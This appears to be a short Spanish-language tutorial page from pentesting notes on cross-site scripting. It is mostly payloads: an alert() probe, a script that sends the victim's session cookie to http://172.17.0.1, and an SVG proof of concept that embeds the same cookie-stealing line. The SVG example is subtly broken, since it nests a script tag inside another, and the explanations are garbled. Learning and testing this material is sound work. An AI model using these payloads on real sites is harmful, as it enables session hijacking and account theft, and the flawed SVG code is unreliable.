XSS Examples

XSS o Cross-Site Scrippting es una técnica que nos permite injectar código o etiquetas ya sea HTML o lenguajes de scripting como JavaScript para posteriormente inyectarlas.

Ejemplo simple

<script>alert('Hello World')</script>

El comando previo nos estaría ejecutando una alert() que nos ayudaría a identificar la existencia de esta vulnerabilidad.

<script>document.location='http://172.17.0.1?cookie='+document.cookie;</script>

Este payload nos permite obligar al usuario que mediante el uso de su cookie acceda en este caso a un servidor montado localmente, para posterior nos brinde las galletas o cookies de su sesión actual.

Example most advance

<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 200 200">
    <!-- Visual SVG -->
    <rect width="200" height="200" fill="#3498db" />

    <!-- Text in the center -->
    <text x="50%" y="50%" font-size="20" text-anchor="middle" dy=".3em" fill="white">Proof of Concept</text>

    <!-- XSS Payload: Execute alert on load -->
    <script type="text/javascript">
     <script>document.location='http://172.17.0.1?cookie='+document.cookie;</script>
    </script>
</svg>

Esta carga solo nos permite la misma ejecución anterior pero en caso la página logre interpretar además el código *.svg, nos podriamos hacer de igual forma de la máquina.

Referencias:

GitHub - intelligencegroup-io/xss-svg: Proof of Concept (PoC) for Cross-Site Scripting (XSS) using an SVG image.GitHub

PreviousBypass NextPATH/Binary Hijacking

Last updated 3 months ago

hashtagEjemplo simple

hashtagCookie Hijacking

hashtagExample most advance

hashtagReferencias:

Ejemplo simple

Cookie Hijacking

Example most advance

Referencias: